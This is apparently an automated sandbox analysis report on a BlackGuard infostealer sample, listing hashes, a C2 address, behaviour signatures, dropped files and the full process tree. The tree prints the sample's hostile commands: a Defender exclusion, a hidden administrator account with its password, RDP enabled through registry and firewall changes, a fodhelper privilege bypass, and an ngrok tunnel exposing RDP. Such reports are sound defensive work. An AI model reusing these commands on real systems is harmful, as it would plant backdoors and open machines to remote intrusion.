Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230621-en
  • resource tags
    arch:x64 arch:x86 image:win10v2004-20230621-en locale:en-us os:windows10-2004-x64 system
  • submitted
    01-07-2023 07:01

General

  • Target

    Build1exe.exe

  • Size

    115KB

  • MD5

    bfaa027a645e567824a10a26fb8dbefd

  • SHA1

    4ab52a0b1cc105a5462c2255ef84be9af431b82e

  • SHA256

    c67b6f45d0beb461838f87ca2ad4774b52d7ccf9b0fa36652e8642dc72f43302

  • SHA512

    2f7ab0e4451cfeec017ba294cfcbc6f02d85c756bebce1cf9b3c69f6c77386fe9a21897734c44f4aa32dcaf3a1b7fbaaf0c4639edab1c8961761767a656b4569

  • SSDEEP

    1536:ztCbuEYE+9z2wpuFavGmhMnDIhzZtz20tnh/:5CbuAsEFNmhMnDIhNI0tnh/

Malware Config

Extracted

Family

blackguard

C2

http://94.142.138.111

Signatures

  • BlackGuard

    Infostealer first seen in late 2021.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Allows Network login with blank passwords 1 TTPs 1 IoCs

    Allows local user accounts with blank passwords to access device from the network.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies registry class 14 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Build1exe.exe
    "C:\Users\Admin\AppData\Local\Temp\Build1exe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1500
    • C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe
      "C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe"
      2⤵
      • Allows Network login with blank passwords
      • Checks computer location settings
      • Executes dropped EXE
      • Accesses Microsoft Outlook profiles
      • Adds Run key to start application
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • outlook_office_path
      • outlook_win_path
      PID:4656
      • C:\Windows\System32\fodhelper.exe
        "C:\Windows\System32\fodhelper.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:64
        • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
          "PowerShell.exe" -command Add-MpPreference -ExclusionPath C:\
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3704
      • C:\Windows\System32\fodhelper.exe
        "C:\Windows\System32\fodhelper.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4396
        • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
          "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/Snup.bat
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4788
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Snup.bat""
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1216
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2004
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2400
              • C:\Windows\system32\find.exe
                Find "="
                7⤵
                PID:2688
            • C:\Windows\system32\net.exe
              net user BlackTeam JesF3301asS /add /active:"yes" /expires:"never" /passwordchg:"NO"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4664
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user BlackTeam JesF3301asS /add /active:"yes" /expires:"never" /passwordchg:"NO"
                7⤵
                PID:3484
            • C:\Windows\system32\net.exe
              net localgroup Administrators BlackTeam /add
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4076
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators BlackTeam /add
                7⤵
                PID:4620
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1468
              • C:\Windows\system32\find.exe
                Find "="
                7⤵
                PID:4128
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1008
            • C:\Windows\system32\net.exe
              net localgroup "Remote Desktop Users" BlackTeam /add
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2756
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup "Remote Desktop Users" BlackTeam /add
                7⤵
                PID:648
            • C:\Windows\system32\net.exe
              net accounts /forcelogoff:no /maxpwage:unlimited
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4208
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
                7⤵
                PID:2080
            • C:\Windows\system32\reg.exe
              reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
              6⤵
              PID:4388
            • C:\Windows\system32\reg.exe
              reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server'" /v "'fDenyTSConnections'" /t REG_DWORD /d 0x0 /f
              6⤵
              PID:2044
            • C:\Windows\system32\reg.exe
              reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'" /v "'MaxConnectionTime'" /t REG_DWORD /d 0x1 /f
              6⤵
              PID:1452
            • C:\Windows\system32\reg.exe
              reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'" /v "'MaxDisconnectionTime'" /t REG_DWORD /d 0x0 /f
              6⤵
              PID:5060
            • C:\Windows\system32\reg.exe
              reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'" /v "'MaxIdleTime'" /t REG_DWORD /d 0x0 /f
              6⤵
              PID:4272
            • C:\Windows\system32\reg.exe
              reg add "'HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'" /v BlackTeam /t REG_DWORD /d 0x0 /f
              6⤵
              PID:4336
            • C:\Windows\system32\attrib.exe
              attrib C:\users\BlackTeam +r +a +s +h
              6⤵
              • Sets file to hidden
              • Views/modifies file attributes
              PID:576
      • C:\Windows\System32\fodhelper.exe
        "C:\Windows\System32\fodhelper.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5100
        • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
          "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/ngrok.exe config add-authtoken 2NyX6XCTEbUWXHKRvIrQm5uLmlE_89gv98vabRAC8AQ1jM6gV
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1748
          • C:\Users\Admin\AppData\Local\Temp\ngrok.exe
            "C:\Users\Admin\AppData\Local\Temp\ngrok.exe" config add-authtoken 2NyX6XCTEbUWXHKRvIrQm5uLmlE_89gv98vabRAC8AQ1jM6gV
            5⤵
            • Executes dropped EXE
            PID:3860
      • C:\Windows\System32\fodhelper.exe
        "C:\Windows\System32\fodhelper.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4864
        • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
          "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/ngrok.exe tcp 3389
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4896
          • C:\Users\Admin\AppData\Local\Temp\ngrok.exe
            "C:\Users\Admin\AppData\Local\Temp\ngrok.exe" tcp 3389
            5⤵
            • Executes dropped EXE
            • Modifies system certificate store
            PID:2076
      • C:\Windows\System32\fodhelper.exe
        "C:\Windows\System32\fodhelper.exe"
        3⤵
        PID:3928
        • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
          "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/vhttd.exe -i
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1716
          • C:\Users\Admin\AppData\Local\Temp\vhttd.exe
            "C:\Users\Admin\AppData\Local\Temp\vhttd.exe" -i
            5⤵
            • Sets DLL path for service in the registry
            • Executes dropped EXE
            • Modifies WinLogon
            • Drops file in System32 directory
            • Drops file in Program Files directory
            PID:3188
            • C:\Windows\SYSTEM32\netsh.exe
              netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
              6⤵
              • Modifies Windows Firewall
              PID:2584
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    1⤵
    PID:2648
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    1⤵
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    PID:3620

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Program Files\RDP Wrapper\rdpwrap.dll

    Filesize

    48KB

    MD5

    678a88c83e62ff5bf041a9ba87243fb4

    SHA1

    91a3c580f17172ed2c8d419af4b15e2c545d6a72

    SHA256

    c9786df320ad6127bece91c530bc6fddfff41286c944fd76d44b60799dbe49b8

    SHA512

    5392a452aceef18d3edc89c2998692dd73e551ed5c62c481a54daec564312a94fd99cc2dce2fdd18c6b297ff83ecfa181e78574423d008a456a8569f04c7daef

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    d28a889fd956d5cb3accfbaf1143eb6f

    SHA1

    157ba54b365341f8ff06707d996b3635da8446f7

    SHA256

    21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

    SHA512

    0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    4c1d4d9e62e20e2eccac10a5e9cd5fa8

    SHA1

    0c5b93ebec72e1bf977167cd08f4426530596190

    SHA256

    7729f5815a7412bd5de5a2d064d9f7671bad9e77fa0b79d7ed8b6d8d4b3b8250

    SHA512

    dd04dbc218adbe02b962b2699b536e37766bba525dcd950737e0cce4b79c6e337cf11baa710bd97e440e753d67bc7d2cd63276a56c5d544aa89738308f75d4bb

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    446dd1cf97eaba21cf14d03aebc79f27

    SHA1

    36e4cc7367e0c7b40f4a8ace272941ea46373799

    SHA256

    a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

    SHA512

    a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

  • C:\Users\Admin\AppData\Local\Temp\Snup.bat

    Filesize

    1KB

    MD5

    3bb16d80a3dbf1c6cdb06e52fcaab5ba

    SHA1

    59ab02029d135f93c5cd2b153d69663e216b1965

    SHA256

    6ad6b4cf1bc3786ceea552b17b244a49896ee703baf53d4008262790a79c97b5

    SHA512

    cec268b374ea8b739aaf72708d58bd425b79a411e9241ea6adfa44eb40204ed6ec509609e40b53fb6c468e037bc4b762a38a9160bf5e746c06c622e3fada5dcb

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jx1iwjgr.o2c.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe

    Filesize

    3.4MB

    MD5

    e695b8888af3b57f1a56961bd289463c

    SHA1

    e8c3892fcf4635a16fe91b9542953e2ac5141df2

    SHA256

    c5a45793d7c361f18d36c190b86c951bf0e7a01ad52132c7e9e9d4101eff73aa

    SHA512

    3c1ba39b7819020ad748bfd8bc0cca01fda5e5c7a2111ec6c034bf99e1974f27cb6a1ad7b3e26ffcfb150c447349661771fd21d54c25602ab01c1b1b43346ce1

  • C:\Users\Admin\AppData\Local\Temp\ngrok.exe

    Filesize

    20.5MB

    MD5

    0de87b2cb6b4f4c247d7f28b01f3575a

    SHA1

    336aec3afaf84c8dc897eea14d207c5240d04312

    SHA256

    05596cac3448ed1d0e132c96bd45f02769e08932d4e60be4c918fea9d1064ef7

    SHA512

    5e2d4e457b0ab97d899e8ee32c1dfc14ef58f8d7578c6268689b91e7efc4aa56d62038976a1085646e436da9f176135f76a1d6498baa29376731e4f9d3996599

  • C:\Users\Admin\AppData\Local\Temp\vhttd.exe

    Filesize

    445KB

    MD5

    2612258ab4e2221b52974b5c0154fffd

    SHA1

    2aa58664874516b338325d1fd8205421815b2cba

    SHA256

    833d6f4de177cf07ceccbb0ceb910f7785df60941a61c7154ed747ec845f51ae

    SHA512

    02b000c89fc2f49f55e9ecacd17656cc5fbe948e2717ad4876b98d73ff30182cfa43ed05d0820cc4c427e79d6c7aaabf299a9c24158e34a96ad6008f9521483c

  • C:\Users\Admin\AppData\Local\hndtbrK.FEror\Files\SetHide.docx

    Filesize

    927KB

    MD5

    109b36186a778c52684d5a8cba13c0d1

    SHA1

    fba52fbec30a61a897bda2c857dd427281fc96ec

    SHA256

    21cb9f094bb72a040fbc200ec79e7c26e22f85b365345a2f212a313d2a15da50

    SHA512

    90468994450f9a95f3246f18448b15dacfeda02ab622c4fd081dae3082dbd1a8e9bd82cc804394e41c3e05e3d7562868a8d9ec40ca9b7133ca9a4d50c6cfa136

  • C:\Users\Admin\AppData\Local\hndtbrK.FEror\sysInformation.txt

    Filesize

    809B

    MD5

    1b562262ecb01068d8875cb813f230c0

    SHA1

    6a2245b061f230f34cac7e6392651a73a4afb8b9

    SHA256

    7adc38fcb5f896b8799d961a124e7414f8de076c8c44e831c286c37465136e02

    SHA512

    232a42cf58cc1fd7983fd0f803a9e78b6d1f8704a2208d6cf824a824fb080d3930e746ac5a9781e3b7e4e2586af3ea9deae0b22c20a56a9550be206e56e69d3c

  • C:\Users\Admin\AppData\Local\ngrok\ngrok.yml

    Filesize

    74B

    MD5

    3f59f4babd65b227a58360b831b98788

    SHA1

    defec650f03d965ed0e30998d674a548a5ef4409

    SHA256

    e3746d47fd21a64b5d0f18226370a7e76a514b62dcc6a61174b103539600a945

    SHA512

    26c464abf8fb60aef8eeb7717257d032ed68cee51cc794d0821b79e4e86df490d85144ff35afad4ac293fbb10765099e04ddaf2b51ec01948aad210ff6b6195c

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    6KB

    MD5

    fa5925d53010daf51baaf83a4530d0a7

    SHA1

    e98fe15b480bca64f327912896fb208e5d25e882

    SHA256

    6b0fa9c338771d61dd77986e99dab657e4f53d3d69743df73e8387ccb8a9c4f5

    SHA512

    e9960fa90ae77b5fc96ce3842ace46ddc3990b2ca4d3a29f01308587ce36d35095373f23b69be104f8ba05f2a9e5f64f0cbc0ac684d4de0e12bf223bf811812b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    6KB

    MD5

    9c3a3bcbf1e49c0aedc344ec01778c3f

    SHA1

    9467db573901474701063db2592179723b7ebff9

    SHA256

    0fc4e21d35e238d8ca8ff30d3f9151557cda995782506c0c5cbe6a77ed395ba0

    SHA512

    f1a69f448d63ade9e39c38c44146aee4ddce842de03e5a78ff7809bd6e26a4972e3d1984f8f510da8fdcad54ab716368eafdb35e61a7a889f8485b859de2c792

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    6KB

    MD5

    6ecba2585d52e9e47fc41767651479d6

    SHA1

    c37605884aada75f012ece85ceaf9f8e49d3d9d0

    SHA256

    c7ac427681fe444b398542d373c6ec3588f7d30c791dc7dde63707b61cb52adf

    SHA512

    037d570887df4ac4cc89a145c27431e21b99efae95f0a83782ac6e863875bcd686c2ae92aca7b2cc194fc20fdefcc846b85e963e6641f4cb8d74260c9a8658a3

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    6KB

    MD5

    7f6e15b9d38e83860783e275fca01797

    SHA1

    5d5e0a45c8a698a848c91e32a750b030a2dc6359

    SHA256

    5d37a7d472f3470c331447aa47c861c26bde72fc6889e68d4423c69a65284117

    SHA512

    77699f3aefca3602001492685857c533296e31315e7fe30417fb31ad7d63286ff18dd25a7267424b3e3606cd68da378bbb80ef8f95dfe9fc9e47fbe74c019c24

• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 6KB
  MD5: 7549f1117ddcd74ea60a39ed7509f88a
  SHA1: 94c86586149b07421ff1f745360074424e0942c4
  SHA256: 5cc800846386194f6a6b622c071642c3ad6861a43fe715145dd2bf46d762bf5b
  SHA512: 0b6f5c833039805ce850efb571479bfbd5fe7617c2864856ea7f0f03a2e210fd7767ea46a354aed0f31493e4f778fb4fad4a571135c05b6ccfef3041b25a88e1

• \??\c:\program files\rdp wrapper\rdpwrap.dll
  Filesize: 48KB
  MD5: 678a88c83e62ff5bf041a9ba87243fb4
  SHA1: 91a3c580f17172ed2c8d419af4b15e2c545d6a72
  SHA256: c9786df320ad6127bece91c530bc6fddfff41286c944fd76d44b60799dbe49b8
  SHA512: 5392a452aceef18d3edc89c2998692dd73e551ed5c62c481a54daec564312a94fd99cc2dce2fdd18c6b297ff83ecfa181e78574423d008a456a8569f04c7daef

• \??\c:\program files\rdp wrapper\rdpwrap.ini
  Filesize: 338KB
  MD5: 98082786e440be307873aafea2ea092e
  SHA1: 089f39ae279fec8fe2bf6d040457e9d3d566f348
  SHA256: 8de2b36a407ebc818459d6792b3f14cad6372a9c4756eeffeaf8455ccfba16e5
  SHA512: 2d069b1f6144cba156eb9734b074a8c2bc42bfce14baa622c25c29d5ca81a8bdc6076eb134b0c4eaa99e834a7cae69c69c7a6e88b86e8d5b2afbf58193b908a9

• memory/1500-133-0x00000218AE720000-0x00000218AE73A000-memory.dmp
  Filesize: 104KB

• memory/1500-134-0x00000218C8D50000-0x00000218C8D60000-memory.dmp
  Filesize: 64KB

• memory/1500-136-0x00000218C8D50000-0x00000218C8D60000-memory.dmp
  Filesize: 64KB

• memory/1716-289-0x0000023B34BD0000-0x0000023B34BE0000-memory.dmp
  Filesize: 64KB

• memory/1716-290-0x0000023B34BD0000-0x0000023B34BE0000-memory.dmp
  Filesize: 64KB

• memory/1716-288-0x0000023B34BD0000-0x0000023B34BE0000-memory.dmp
  Filesize: 64KB

• memory/1748-240-0x000001C352630000-0x000001C352640000-memory.dmp
  Filesize: 64KB

• memory/1748-241-0x000001C352630000-0x000001C352640000-memory.dmp
  Filesize: 64KB

• memory/1748-239-0x000001C352630000-0x000001C352640000-memory.dmp
  Filesize: 64KB

• memory/3188-293-0x0000000000400000-0x0000000000592000-memory.dmp
  Filesize: 1.6MB

• memory/3188-301-0x0000000000400000-0x0000000000592000-memory.dmp
  Filesize: 1.6MB

• memory/3620-300-0x00007FFEA27E0000-0x00007FFEA2806000-memory.dmp
  Filesize: 152KB

• memory/3704-163-0x00000193F65C0000-0x00000193F65D0000-memory.dmp
  Filesize: 64KB

• memory/3704-162-0x00000193F65C0000-0x00000193F65D0000-memory.dmp
  Filesize: 64KB

• memory/3704-164-0x00000193F65C0000-0x00000193F65D0000-memory.dmp
  Filesize: 64KB

• memory/4656-177-0x000001C3DDB50000-0x000001C3DDD12000-memory.dmp
  Filesize: 1.8MB

• memory/4656-148-0x000001C3C2730000-0x000001C3C2A7A000-memory.dmp
  Filesize: 3.3MB

• memory/4656-180-0x000001C3C2E00000-0x000001C3C2E10000-memory.dmp
  Filesize: 64KB

• memory/4656-179-0x000001C3DDAA0000-0x000001C3DDB16000-memory.dmp
  Filesize: 472KB

• memory/4656-149-0x000001C3C2E00000-0x000001C3C2E10000-memory.dmp
  Filesize: 64KB

• memory/4656-150-0x000001C3C46C0000-0x000001C3C46E2000-memory.dmp
  Filesize: 136KB

• memory/4656-178-0x000001C3DD9D0000-0x000001C3DDA20000-memory.dmp
  Filesize: 320KB

• memory/4788-218-0x000001661A000000-0x000001661A010000-memory.dmp
  Filesize: 64KB

• memory/4788-217-0x000001661A000000-0x000001661A010000-memory.dmp
  Filesize: 64KB

• memory/4896-272-0x000001CAA2010000-0x000001CAA2020000-memory.dmp
  Filesize: 64KB

• memory/4896-263-0x000001CAA2010000-0x000001CAA2020000-memory.dmp
  Filesize: 64KB

• memory/4896-262-0x000001CAA2010000-0x000001CAA2020000-memory.dmp
  Filesize: 64KB

• memory/4896-264-0x000001CAA2010000-0x000001CAA2020000-memory.dmp
  Filesize: 64KB

• memory/4896-270-0x000001CAA2010000-0x000001CAA2020000-memory.dmp
  Filesize: 64KB

• memory/4896-271-0x000001CAA2010000-0x000001CAA2020000-memory.dmp
  Filesize: 64KB